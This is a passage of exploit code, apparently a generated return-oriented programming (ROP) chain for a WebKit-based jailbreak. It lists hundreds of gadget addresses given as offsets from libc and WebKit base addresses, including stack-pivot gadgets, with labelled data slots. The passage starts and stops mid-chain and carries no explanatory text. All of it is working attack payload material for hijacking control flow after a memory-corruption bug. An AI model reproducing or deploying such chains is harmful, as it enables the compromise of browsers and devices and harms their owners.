rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1434: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+120984, //L1435 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1435: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+121088, //L1437 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1437: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1439: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+121208, //L1442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+121192, //L1440 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1440: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1442: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+121352, //L1445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+121320, //L1443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+121336, //L1444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1443: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1444: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1445: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+121424, //L1447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1447: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+121480, //L1448 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1448: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+121576, //L1451 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1450: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1451: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1452: db([31, 0]); // 0x1f set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+121672, //L1453 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+121688, //L1454 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1453: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1454: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+121776, //L1456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1456: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+121832, //L1457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1457: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+121904, //L1460 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1460: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+121960, //L1461 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1461: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1463: libc_base+759608, //pop rax libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+122096, //L1464 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1464: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1466: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+122216, //L1469 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+122200, //L1467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1467: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1469: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+122360, //L1472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+122328, //L1470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+122344, //L1471 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1470: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1471: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1472: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+122432, //L1474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1474: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+122488, //L1475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1475: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+122584, //L1478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1477: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1478: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1479: db([32, 0]); // 0x20 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+122680, //L1480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+122696, //L1481 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1480: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1481: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+122784, //L1483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1483: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+122840, //L1484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1484: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+122912, //L1487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1487: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+122968, //L1488 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1488: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+123056, //L1490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1490: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1492: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+123176, //L1495 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+123160, //L1493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1493: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1495: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+123320, //L1498 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+123288, //L1496 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+123304, //L1497 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1496: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1497: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1498: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+123392, //L1500 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1500: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+123448, //L1501 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1501: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+123544, //L1504 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1503: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1504: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1505: db([37, 0]); // 0x25 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+123640, //L1506 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+123656, //L1507 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1506: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1507: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+123744, //L1509 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1509: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+123800, //L1510 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1510: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+123904, //L1512 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1512: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1514: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+124024, //L1517 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+124008, //L1515 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1515: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1517: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+124168, //L1520 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+124136, //L1518 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+124152, //L1519 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1518: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1519: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1520: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+124240, //L1522 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1522: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+124296, //L1523 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1523: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+124392, //L1526 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1525: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1526: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1527: db([33, 0]); // 0x21 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+124488, //L1528 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+124504, //L1529 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1528: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1529: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+124592, //L1531 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1531: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+124648, //L1532 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1532: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+124720, //L1535 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1535: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+124776, //L1536 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1536: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1538: libc_base+426295, //mov [rdi], rax libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+124912, //L1539 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1539: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1541: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+125032, //L1544 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+125016, //L1542 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1542: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1544: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+125176, //L1547 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+125144, //L1545 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+125160, //L1546 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1545: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1546: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1547: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+125248, //L1549 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1549: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+125304, //L1550 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1550: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+125400, //L1553 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1552: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1553: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1554: db([34, 0]); // 0x22 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+125496, //L1555 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+125512, //L1556 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1555: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1556: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+125600, //L1558 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1558: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+125656, //L1559 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1559: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+125728, //L1562 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1562: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+125784, //L1563 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1563: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+759608, //pop rax //L1565: libc_base+782311, //pop rsp libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+125920, //L1566 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1566: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1568: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+126040, //L1571 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+126024, //L1569 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1569: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1571: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+126184, //L1574 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+126152, //L1572 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+126168, //L1573 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1572: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1573: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1574: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+126256, //L1576 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1576: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+126312, //L1577 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1577: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+126408, //L1580 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1579: db([8, 0]); // 0x8 set_gadget(webkit_base+3236123,); //pop r9 //L1580: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1581: db([35, 0]); // 0x23 set_gadgets([ webkit_base+10973692, //imul rax, rcx libc_base+764760, //pop rsi ropchain+126504, //L1582 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+126520, //L1583 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L1582: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L1583: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+764760, //pop rsi ropchain+126608, //L1585 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1585: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+126664, //L1586 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1586: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+126736, //L1589 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1589: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+126792, //L1590 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1590: db([0, 0]); // 0x0 set_gadgets([ webkit_base+20307877, //mov [rax], rcx libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+126880, //L1592 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L1592: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L1594: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+127000, //L1597 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+126984, //L1595 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L1595: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L1597: db([0, 0]); // 0x0 